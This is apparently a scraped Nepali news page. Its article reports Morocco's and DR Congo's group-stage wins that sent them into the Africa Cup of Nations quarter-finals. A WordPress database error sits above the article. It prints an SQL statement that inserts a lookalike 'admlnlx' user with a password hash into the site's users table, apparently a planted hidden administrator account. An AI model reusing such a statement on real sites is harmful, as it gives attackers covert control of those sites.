WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bi/0jHnkdx3XZQPLxg6wue6CcknVgS1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-05 02:54:34', '', 'admlnlx', 'admlnlx')
अफ्रिका,माघ १२ –
मोरक्को र प्रजातान्त्रिक गणतन्त्र कङ्गो अफ्रिका कप अफ नेशनको क्वाटरफाइनलमा प्रवेश गरेका छन् । मंगलबार राति भएको खेलमा मोरक्कोले आइभरी कोस्ट र कङ्गोले टोगोलाई पराजित गर्दै क्वाटरफाइनलमा स्थान बनाएको हो ।
समूह चरणको अन्तिम खेलमा साबिकको बिजेता आइभरी कोस्टलाई १–० ले पराजित गर्दै मोरक्कोले अन्तिम ८ मा स्थान बनाएको हो । पहिलो हाफ गोलरहित बराबरी सकिएको खेलमा जित निकाल्दै मोरक्को समूह ‘सी’ को उपविजेताको रुपमा क्वाटरफाइनलमा पुग्न सफल भयो । मोरक्कोको जितमा ६४ औं मिनेटमा राचिड अलियीले गरेको गोल नै निर्णायक बन्यो ।
मोरक्कोबिरुद्ध गोल गर्न नसकेको साबिकको बिजेता आइभरी कोस्ट सन् २०१५ पछि पहिलोपटक अघिल्लो चरणमा प्रवेश गर्न असफल भयो ।
गोबानमा जारी अफ्रिका कप अन्तर्गत नै मंगलबार राती टोगोलाई ३–१ ले पराजित गर्दै कङ्गो समूह ‘सी’ को विजेताको रुपमा अन्तिम ८ मा पुग्यो ।
कङ्गोको जितमा जुनियर काबानान्गा, एनडोम्बे मुबेले र पउल–जोसे एमपोकुले समान एक एक गोल गरे । टोगोका लागि कोड्जो फो–डोह लाबाले एक गोल फर्काए ।